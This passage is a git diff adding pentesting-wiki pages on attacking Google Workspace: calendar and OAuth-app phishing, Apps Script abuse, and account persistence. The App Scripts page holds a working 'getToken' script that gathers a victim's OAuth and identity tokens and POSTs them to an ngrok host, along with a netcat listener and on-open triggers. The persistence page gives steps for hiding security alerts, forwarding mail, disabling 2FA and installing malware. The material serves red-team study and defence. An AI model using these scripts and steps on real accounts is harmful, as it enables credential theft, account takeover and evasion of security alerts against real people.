+You can **create a calendar event** and add as many email address of the company you are attacking as you have. Schedule this calendar event in **5 or 15 min** from the current time. Make the event look legit and **put a comment and a title indicating that they need to read something** (with the **phishing link**).
+
+This is the alert that will appear in the browser with a meeting title "Firing People", so you could set a more phishing like title (and even change the name associated with your email).
+
+<figure><img src="../../../.gitbook/assets/image (8).png" alt=""><figcaption></figcaption></figure>
+
+To make it look less suspicious:
+
+* Set it up so that **receivers cannot see the other people invited**
+* Do **NOT send emails notifying about the event**. Then, the people will only see their warning about a meeting in 5mins and that they need to read that link.
+* Apparently using the API you can set to **True** that **people** have **accepted** the event and even create **comments on their behalf**.
+
+## App Scripts Redirect Phishing
+
+It's possible to create a script in [https://script.google.com/](https://script.google.com/) and **expose it as a web application accessible by everyone** that will use the legit domain **`script.google.com`**.\
+The with some code like the following an attacker could make the script load arbitrary content in this page without stop accessing the domain:
+
+{% code overflow="wrap" %}
+```javascript
+function doGet() {
+  return HtmlService.createHtmlOutput('<meta http-equiv="refresh" content="0;url=https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing#app-scripts-redirect-phishing">')
+        .setXFrameOptionsMode(HtmlService.XFrameOptionsMode.ALLOWALL);
+}
+```
+{% endcode %}
+
+For example accessing [https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH\_ZscKQTJDC/exec](https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH_ZscKQTJDC/exec) you will see:
+
+<figure><img src="../../../.gitbook/assets/image (4) (1).png" alt=""><figcaption></figcaption></figure>
+
+{% hint style="success" %}
+Note that a warning will appear as the content is loaded inside an iframe.
+{% endhint %}
+
+## App Scripts OAuth Phishing
+
+It's possible to create App Scripts attached to documents to try to get access over a victims OAuth token, for more information check:
+
+{% content-ref url="gws-app-scripts.md" %}
+[gws-app-scripts.md](gws-app-scripts.md)
+{% endcontent-ref %}
+
+## OAuth Apps Phishing
+
+Any of the previous techniques might be used to make the user access a **Google OAuth application** that will **request** the user some **access**. If the user **trusts** the **source** he might **trust** the **application** (even if it's asking for high privileged permissions).
+
+{% hint style="info" %}
+Note that Google presents an ugly prompt asking warning that the application is untrusted in several cases and Workspace admins can even prevent people accepting OAuth applications.
+{% endhint %}
+
+**Google** allows to create applications that can **interact on behalf users** with several **Google services**: Gmail, Drive, GCP...
+
+When creating an application to **act on behalf other users**, the developer needs to create an **OAuth app inside GCP** and indicate the scopes (permissions) the app needs to access the users data.\
+When a **user** wants to **use** that **application**, they will be **prompted** to **accept** that the application will have access to their data specified in the scopes.
+
+This is a very juicy way to **phish** non-technical users into using **applications that access sensitive information** because they might not understand the consequences. However, in organizations accounts, there are ways to prevent this from happening.
+
+### Unverified App prompt
+
+As it was mentioned, google will always present a **prompt to the user to accept** the permissions they are giving the application on their behalf. However, if the application is considered **dangerous**, google will show **first** a **prompt** indicating that it's **dangerous** and **making it more difficult** for the user to grant the permissions to the app.
+
+This prompt appears in apps that:
+
+* Use any scope that can access private data (Gmail, Drive, GCP, BigQuery...)
+* Apps with less than 100 users (apps > 100 a review process is also needed to stop showing the unverified prompt)
+
+### Interesting Scopes
+
+[**Here**](https://developers.google.com/identity/protocols/oauth2/scopes) you can find a list of all the Google OAuth scopes.
+
+* **cloud-platform**: View and manage your data across **Google Cloud Platform** services. You can impersonate the user in GCP.
+* **admin.directory.user.readonly**: See and download your organization's GSuite directory. Get names, phones, calendar URLs of all the users.
+
+### Create an OAuth App
+
+**Start creating an OAuth Client ID**
+
+1. Go to [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient) and click on configure the consent screen.
+2. Then, you will be asked if the **user type** is **internal** (only for people in your org) or **external**. Select the one that suits your needs
+   * Internal might be interesting you have already compromised a user of the organization and you are creating this App to phish another one.
+3. Give a **name** to the app, a **support email** (note that you can set a googlegroup email to try to anonymize yourself a bit more), a **logo**, **authorized domains** and another **email** for **updates**.
+4. **Select** the **OAuth scopes**.
+   * This page is divided in non sensitive permissions, sensitive permissions and restricted permissions. Eveytime you add a new permisison it's added on its category. Depending on the requested permissions different prompt will appear to the user indicating how sensitive these permissions are.
+   * Both **`admin.directory.user.readonly`** and **`cloud-platform`** are sensitive permissions.
+5. **Add the test users.** As long as the status of the app is testing, only these users are going to be able to access the app so make sure to **add the email you are going to be phishing**.
+
+Now let's get **credentials for a web application** using the **previously created OAuth Client ID**:
+
+1. Go back to [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient), a different option will appear this time.
+2. Select to **create credentials for a Web application**
+3. Set needed **Javascript origins** and **redirect URIs**
+   * You can set in both something like **`http://localhost:8000/callback`** for testing
+4. Get your application **credentials**
+
+Finally, lets **run a web application that will use the OAuth application credentials**. You can find an example in [https://github.com/carlospolop/gcp\_oauth\_phishing\_example](https://github.com/carlospolop/gcp_oauth_phishing_example).
+
+```bash
+git clone ttps://github.com/carlospolop/gcp_oauth_phishing_example
+cd gcp_oauth_phishing_example
+pip install flask requests google-auth-oauthlib
+python3 app.py --client-id "<client_id>" --client-secret "<client_secret>"
+```
+
+Go to **`http://localhost:8000`** click on the Login with Google button, you will be **prompted** with a message like this one:
+
+<figure><img src="../../../.gitbook/assets/image (333).png" alt=""><figcaption></figcaption></figure>
+
+The application will show the **access and refresh token** than can be easily used. For more information about **how to use these tokens check**:
+
+{% content-ref url="../../gcp-security/gcp-persistence/gcp-non-svc-persistance.md" %}
+[gcp-non-svc-persistance.md](../../gcp-security/gcp-persistence/gcp-non-svc-persistance.md)
+{% endcontent-ref %}
+
+#### Using `glcoud`
+
+It's possible to do something using gcloud instead of the web console, check:
+
+{% content-ref url="../../gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md" %}
+[gcp-clientauthconfig-privesc.md](../../gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
+* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md b/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md
new file mode 100644
index 0000000000..09b6ffa5b7
--- /dev/null
+++ b/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md
@@ -0,0 +1,273 @@
+# GWS - App Scripts
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## App Scripts
+
+App Scripts is **code that will be triggered when a user with editor permission access the doc the App Script is linked with** and after **accepting the OAuth prompt**.\
+They can also be set to be **executed every certain time** by the owner of the App Script (Persistence).
+
+### Create App Script
+
+There are several ways to create an App Script, although the most common ones are f**rom a Google Document (of any type)** and as a **standalone project**:
+
+<details>
+
+<summary>Create a container-bound project from Google Docs, Sheets, or Slides</summary>
+
+1. Open a Docs document, a Sheets spreadsheet, or Slides presentation.
+2. Click **Extensions** > **Google Apps Script**.
+3. In the script editor, click **Untitled project**.
+4. Give your project a name and click **Rename**.
+
+</details>
+
+<details>
+
+<summary>Create a standalone project</summary>
+
+To create a standalone project from Apps Script:
+
+1. Go to [`script.google.com`](https://script.google.com/).
+2. Click add **New Project**.
+3. In the script editor, click **Untitled project**.
+4. Give your project a name and click **Rename**.
+
+</details>
+
+<details>
+
+<summary>Create a standalone project from Google Drive</summary>
+
+1. Open [Google Drive](https://drive.google.com/).
+2. Click **New** > **More** > **Google Apps Script**.
+
+</details>
+
+<details>
+
+<summary>Create a container-bound project from Google Forms</summary>
+
+1. Open a form in Google Forms.
+2. Click More more\_vert > **Script editor**.
+3. In the script editor, click **Untitled project**.
+4. Give your project a name and click **Rename**.
+
+</details>
+
+<details>
+
+<summary>Create a standalone project using the clasp command line tool</summary>
+
+`clasp` is a command line tool that allows you create, pull/push, and deploy Apps Script projects from a terminal.
+
+See the [Command Line Interface using `clasp` guide](https://developers.google.com/apps-script/guides/clasp) for more details.
+
+</details>
+
+## App Script Scenario <a href="#create-using-clasp" id="create-using-clasp"></a>
+
+### Create Google Sheet with App Script
+
+Start by crating an App Script, my recommendation for this scenario is to create a Google Sheet and go to **`Extensions > App Scripts`**, this will open a **new App Script for you linked to the sheet**.
+
+### Leak token
+
+In order to give access to the OAuth token you need to click on **`Services +` and add scopes like**:
+
+* **AdminDirectory**: Access users and groups of the directory (if the user has enough permissions)
+* **Gmail**: To access gmail data
+* **Drive**: To access drive data
+* **Google Sheets API**: So it works with the trigger
+
+To change yourself the **needed scopes** you can go to project settings and enable: **`Show "appsscript.json" manifest file in editor`.**
+
+{% code overflow="wrap" %}
+```javascript
+function getToken() {
+  var userEmail = Session.getActiveUser().getEmail();
+  var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1);
+  var oauthToken = ScriptApp.getOAuthToken();
+  var identityToken = ScriptApp.getIdentityToken();
+  
+  // Data json
+  data = {
+    "oauthToken": oauthToken,
+    "identityToken": identityToken,
+    "email": userEmail,
+    "domain": domain
+  }
+
+  // Send data
+  makePostRequest(data);
+  
+  // Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions
+  
+  // To ask for AdminDirectory permissions
+  var pageToken = "";
+  page = AdminDirectory.Users.list({
+    domain: domain,  // Use the extracted domain
+    orderBy: 'givenName',
+    maxResults: 100,
+    pageToken: pageToken
+  });
+
+  // To ask for gmail permissions
+  var threads = GmailApp.getInboxThreads(0, 10);
+
+  // To ask for drive permissions
+  var files = DriveApp.getFiles();
+}
+
+
+function makePostRequest(data) {
+  var url = 'http://5.tcp.eu.ngrok.io:12027';
+  
+  var options = {
+    'method' : 'post',
+    'contentType': 'application/json',
+    'payload' : JSON.stringify(data)
+  };
+  
+  try {
+    UrlFetchApp.fetch(url, options);
+  } catch (e) {
+    Logger.log("Error making POST request: " + e.toString());
+  }
+}
+```
+{% endcode %}
+
+To capture the request you can just run:
+
+```bash
+ngrok tcp 4444
+nc -lv 4444 #macOS
+```
+
+Permissions requested to execute the App Script:
+
+<figure><img src="../../../.gitbook/assets/image (334).png" alt=""><figcaption></figcaption></figure>
+
+{% hint style="warning" %}
+As an external request is made the OAuth prompt will also **ask to permission to reach external endpoints**.
+{% endhint %}
+
+### Create Trigger
+
+Once the App is read, click on **⏰ Triggers** to create a trigger. As **function** ro tun choose **`getToken`**, runs at deployment **`Head`**, in event source select **`From spreadsheet`** and event type select **`On open`** or **`On edit`** (according to your needs) and save.
+
+Note that you can check the **runs of the App Scripts in the Executions tab** if you want to debug something.
+
+### Sharing
+
+In order to **trigger** the **App Script** the victim needs to connect with **Editor Access**.
+
+{% hint style="success" %}
+The **token** used to execute the **App Script** will be the one of the **creator of the trigger**, even if the file is opened as Editor by other users.
+{% endhint %}
+
+### Abusing Shared With Me documents
+
+{% hint style="danger" %}
+If someone **shared with you a document with App Scripts and a trigger using the Head** of the App Script (not a fixed deployment), you can modify the App Script code (adding for example the steal token functions), access it, and the **App Script will be executed with the permissions of the user that shared the document with you**! (note that the owners OAuth token will have as access scopes the ones given when the trigger was created).
+
+A **notification will be sent to the creator of the script indicating that someone modified the script** (What about using gmail permissions to generate a filter to prevent the alert?)
+{% endhint %}
+
+{% hint style="success" %}
+If an **attacker modifies the scopes of the App Script** the updates **won't be applied** to the document until a **new trigger** with the changes is created. Therefore, an attacker won't be able to steal the owners creator token with more scopes than the one he set in the trigger he created.
+{% endhint %}
+
+### Copying instead of sharing
+
+When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\
+If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document:**
+
+<figure><img src="../../../.gitbook/assets/image (335).png" alt=""><figcaption></figcaption></figure>
+
+If the user copies it an access it both the **contents of the document and the App Scripts will be copied**, however the **triggers are not**, therefore **nothing will be executed**.
+
+### Sharing as Web Application
+
+Note that it's also possible to **share an App Script as a Web application** (in the Editor of the App Script, deploy as a Web application), but an alert such as this one will appear:
+
+<figure><img src="../../../.gitbook/assets/image (337).png" alt=""><figcaption></figcaption></figure>
+
+Followed by the **typical OAuth prompt asking** for the needed permissions.
+
+### Testing
+
+You can test a gathered token to list emails with:
+
+{% code overflow="wrap" %}
+```bash
+curl -X GET "https://www.googleapis.com/gmail/v1/users/<user@email>/messages" \
+-H "Authorization: Bearer <token>"
+```
+{% endcode %}
+
+List calendar of the user:
+
+```bash
+curl -H "Authorization: Bearer $OAUTH_TOKEN" \
+     -H "Accept: application/json" \
+     "https://www.googleapis.com/calendar/v3/users/me/calendarList"
+```
+
+## App Script as Persistence
+
+One option for persistence would be to **create a document and add a trigger for the the getToken** function and share the document with the attacker so every-time the attacker opens the file he **exfiltrates the token of the victim.**
+
+It's also possible to create an App Script and make it trigger every X time (like every minute, hour, day...). An attacker that has **compromised credentials or a session of a victim could set an App Script time trigger and leak a very privileged OAuth token every day**:
+
+Just create an App Script, go to Triggers, click on Add Trigger, and select as event source Time-driven and select the options that better suits you:
+
+<figure><img src="../../../.gitbook/assets/image (336).png" alt=""><figcaption></figcaption></figure>
+
+{% hint style="danger" %}
+This will create a security alert email and a push message to your mobile alerting about this.
+{% endhint %}
+
+### Shared Document Unverified Prompt Bypass
+
+Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**.
+
+{% hint style="warning" %}
+This means, that the **creator of the document will appear as creator of any App Script** anyone with editor access creates inside of it.
+
+This also means that the **App Script will be trusted by the Workspace environment** of the creator of the document.
+{% endhint %}
+
+{% hint style="danger" %}
+This also means that if an **App Script already existed** and people have **granted access**, anyone with **Editor** permission on the doc can **modify it and abuse that access.**\
+To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `<img>` tags).
+{% endhint %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/workspace-security/gws-persistence.md b/pentesting-cloud/workspace-security/gws-persistence.md
new file mode 100644
index 0000000000..d4b446fd14
--- /dev/null
+++ b/pentesting-cloud/workspace-security/gws-persistence.md
@@ -0,0 +1,210 @@
+# GWS - Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+{% hint style="danger" %}
+All the actions mentioned in this section that change setting will generate a **security alert to the email and even a push notification to any mobile synced** with the account.
+{% endhint %}
+
+## **Persistence in Gmail**
+
+* You can create **filters to hide** security notifications from Google
+  * `from: (no-reply@accounts.google.com) "Security Alert"`
+  * This will prevent security emails to reach the email (but won't prevent push notifications to the mobile)
+
+<details>
+
+<summary>Steps to create a gmail filter</summary>
+
+(Instructions from [**here**](https://support.google.com/mail/answer/6579))
+
+1. Open [Gmail](https://mail.google.com/).
+2. In the search box at the top, click Show search options ![photos tune](https://lh3.googleusercontent.com/cD6YR_YvqXqNKxrWn2NAWkV6tjJtg8vfvqijKT1_9zVCrl2sAx9jROKhLqiHo2ZDYTE=w36) .
+3. Enter your search criteria. If you want to check that your search worked correctly, see what emails show up by clicking **Search**.
+4. At the bottom of the search window, click **Create filter**.
+5. Choose what you’d like the filter to do.
+6. Click **Create filter**.
+
+Check your current filter (to delete them) in [https://mail.google.com/mail/u/0/#settings/filters](https://mail.google.com/mail/u/0/#settings/filters)
+
+</details>
+
+<figure><img src="../../.gitbook/assets/image (331).png" alt=""><figcaption></figcaption></figure>
+
+* Create **forwarding address to forward sensitive information** (or everything) - You need manual access.
+  * Create a forwarding address in [https://mail.google.com/mail/u/2/#settings/fwdandpop](https://mail.google.com/mail/u/2/#settings/fwdandpop)
+  * The receiving address will need to confirm this
+  * Then, set to forward all the emails while keeping a copy (remember to click on save changes):
+
+<figure><img src="../../.gitbook/assets/image (332).png" alt=""><figcaption></figcaption></figure>
+
+It's also possible create filters and forward only specific emails to the other email address.
+
+## App passwords
+
+If you managed to **compromise a google user session** and the user had **2FA**, you can **generate** an [**app password**](https://support.google.com/accounts/answer/185833?hl=en) (follow the link to see the steps). Note that **App passwords are no longer recommended by Google and are revoked** when the user **changes his Google Account password.**
+
+**Even if you have an open session you will need to know the password of the user to create an app password.**
+
+{% hint style="info" %}
+App passwords can **only be used with accounts that have 2-Step Verification** turned on.
+{% endhint %}
+
+## Change 2-FA and similar
+
+It's also possible to **turn off 2-FA or to enrol a new device** (or phone number) in this page [**https://myaccount.google.com/security**](https://myaccount.google.com/security)**.**\
+**It's also possible to generate passkeys (add your own device), change the password, add mobile numbers for verification phones and recovery, change the recovery email and change the security questions).**
+
+{% hint style="danger" %}
+To **prevent security push notifications** to reach the phone of the user, you could **sign his smartphone out** (although that would be weird) because you cannot sign him in again from here.
+
+It's also possible to **locate the device.**
+{% endhint %}
+
+**Even if you have an open session you will need to know the password of the user to change these settings.**
+
+## Persistence via OAuth Apps
+
+If you have **compromised the account of a user,** you can just **accept** to grant all the possible permissions to an **OAuth App**. The only problem is that Workspace can be configure to **disallow unreviewed external and/or internal OAuth apps.**\
+It is pretty common for Workspace Organizations to not trust by default external OAuth apps but trust internal ones, so if you have **enough permissions to generate a new OAuth application** inside the organization and external apps are disallowed, generate it and **use that new internal OAuth app to maintain persistence**.
+
+Check the following page for more information about OAuth Apps:
+
+{% content-ref url="gws-google-platforms-phishing/" %}
+[gws-google-platforms-phishing](gws-google-platforms-phishing/)
+{% endcontent-ref %}
+
+## Persistence via delegation
+
+You can just **delegate the account** to a different account controlled by the attacker (if you are allowed to do this). In Workspace **Organizations** this option must be **enabled**. It can be disabled for everyone, enabled from some users/groups or for everyone (usually it's only enabled for some users/groups or completely disabled).
+
+<details>
+
+<summary>If you are a Workspace admin check this to enable the feature</summary>
+
+(Information [copied form the docs](https://support.google.com/a/answer/7223765))
+
+As an administrator for your organization (for example, your work or school), you control whether users can delegate access to their Gmail account. You can let everyone have the option to delegate their account. Or, only let people in certain departments set up delegation. For example, you can:
+
+* Add an administrative assistant as a delegate on your Gmail account so they can read and send email on your behalf.
+* Add a group, such as your sales department, in Groups as a delegate to give everyone access to one Gmail account.
+
+Users can only delegate access to another user in the same organization, regardless of their domain or their organizational unit.
+
+#### Delegation limits & restrictions
+
+* **Allow users to grant their mailbox access to a Google group** option: To use this option, it must be enabled for the OU of the delegated account and for each group member's OU. Group members that belong to an OU without this option enabled can't access the delegated account.
+* With typical use, 40 delegated users can access a Gmail account at the same time. Above-average use by one or more delegates might reduce this number.
+* Automated processes that frequently access Gmail might also reduce the number of delegates who can access an account at the same time. These processes include APIs or browser extensions that access Gmail frequently.
+* A single Gmail account supports up to 1,000 unique delegates. A group in Groups counts as one delegate toward the limit.
+* Delegation does not increase the limits for a Gmail account. Gmail accounts with delegated users have the standard Gmail account limits and policies. For details, visit [Gmail limits and policies](https://support.google.com/a/topic/28609).
+
+#### Step 1: Turn on Gmail delegation for your users
+
+**Before you begin:** To apply the setting for certain users, put their accounts in an [organizational unit](https://support.google.com/a/topic/1227584).
+
+1.  [Sign in](https://admin.google.com/) to your [Google Admin console](https://support.google.com/a/answer/182076).
+
+    Sign in using an _administrator account_, not your current account CarlosPolop@gmail.com
+2. In the Admin console, go to Menu ![](https://storage.googleapis.com/support-kms-prod/JxKYG9DqcsormHflJJ8Z8bHuyVI5YheC0lAp)![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)![](https://storage.googleapis.com/support-kms-prod/ocGtUSENh4QebLpvZcmLcNRZyaTBcolMRSyl) **Apps**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Google Workspace**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Gmail**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**User settings**.
+3. To apply the setting to everyone, leave the top organizational unit selected. Otherwise, select a child [organizational unit](https://support.google.com/a/topic/1227584).
+4. Click **Mail delegation**.
+5. Check the **Let users delegate access to their mailbox to other users in the domain** box.
+6. (Optional) To let users specify what sender information is included in delegated messages sent from their account, check the **Allow users to customize this setting** box.
+7. Select an option for the default sender information that's included in messages sent by delegates:
+   * **Show the account owner and the delegate who sent the email**—Messages include the email addresses of the Gmail account owner and the delegate.
+   * **Show the account owner only**—Messages include the email address of only the Gmail account owner. The delegate email address is not included.
+8. (Optional) To let users add a group in Groups as a delegate, check the **Allow users to grant their mailbox access to a Google group** box.
+9. Click **Save**. If you configured a child organizational unit, you might be able to **Inherit** or **Override** a parent organizational unit's settings.
+10. (Optional) To turn on Gmail delegation for other organizational units, repeat steps 3–9.
+
+Changes can take up to 24 hours but typically happen more quickly. [Learn more](https://support.google.com/a/answer/7514107)
+
+#### Step 2: Have users set up delegates for their accounts
+
+After you turn on delegation, your users go to their Gmail settings to assign delegates. Delegates can then read, send, and receive messages on behalf of the user.
+
+For details, direct users to [Delegate and collaborate on email](https://support.google.com/a/users/answer/138350).
+
+</details>
+
+<details>
+
+<summary>From a regular suer, check here the instructions to try to delegate your access</summary>
+
+(Info copied [**from the docs**](https://support.google.com/mail/answer/138350))
+
+You can add up to 10 delegates.
+
+If you're using Gmail through your work, school, or other organization:
+
+* You can add up to 1000 delegates within your organization.
+* With typical use, 40 delegates can access a Gmail account at the same time.
+* If you use automated processes, such as APIs or browser extensions, a few delegates can access a Gmail account at the same time.
+
+1. On your computer, open [Gmail](https://mail.google.com/). You can't add delegates from the Gmail app.
+2. In the top right, click Settings ![Settings](https://lh3.googleusercontent.com/p3J-ZSPOLtuBBR_ofWTFDfdgAYQgi8mR5c76ie8XQ2wjegk7-yyU5zdRVHKybQgUlQ=w36-h36) ![and then](https://lh3.googleusercontent.com/3_l97rr0GvhSP2XV5OoCkV2ZDTIisAOczrSdzNCBxhIKWrjXjHucxNwocghoUa39gw=w36-h36) **See all settings**.
+3. Click the **Accounts and Import** or **Accounts** tab.
+4. In the "Grant access to your account" section, click **Add another account**. If you’re using Gmail through your work or school, your organization may restrict email delegation. If you don’t see this setting, contact your admin.
+   * If you don't see Grant access to your account, then it's restricted.
+5.  Enter the email address of the person you want to add. If you’re using Gmail through your work, school, or other organization, and your admin allows it, you can enter the email address of a group. This group must have the same domain as your organization. External members of the group are denied delegation access.\
+    \
+    **Important:** If the account you delegate is a new account or the password was reset, the Admin must turn off the requirement to change password when you first sign in.
+
+    * [Learn how an Admin can create a user](https://support.google.com/a/answer/33310).
+    * [Learn how an Admin can reset passwords](https://support.google.com/a/answer/33319).
+
+    6\. Click **Next Step** ![and then](https://lh3.googleusercontent.com/QbWcYKta5vh_4-OgUeFmK-JOB0YgLLoGh69P478nE6mKdfpWQniiBabjF7FVoCVXI0g=h36) **Send email to grant access**.
+
+    The person you added will get an email asking them to confirm. The invitation expires after a week.
+
+    If you added a group, all group members will become delegates without having to confirm.
+
+    Note: It may take up to 24 hours for the delegation to start taking effect.
+
+</details>
+
+## Persistence via Android App
+
+If you have a **session inside victims google account** you can browse to the **Play Store** and might be able to **install malware** you have already uploaded to the store directly **to the phone** to maintain persistence and access the victims phone.
+
+## **Persistence via** App Scripts
+
+You can create **time-based triggers** in App Scripts, so if the App Script is accepted by the user, it will be **triggered** even **without the user accessing it**. For more information about how to do this check:
+
+{% content-ref url="gws-google-platforms-phishing/gws-app-scripts.md" %}
+[gws-app-scripts.md](gws-google-platforms-phishing/gws-app-scripts.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
+* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
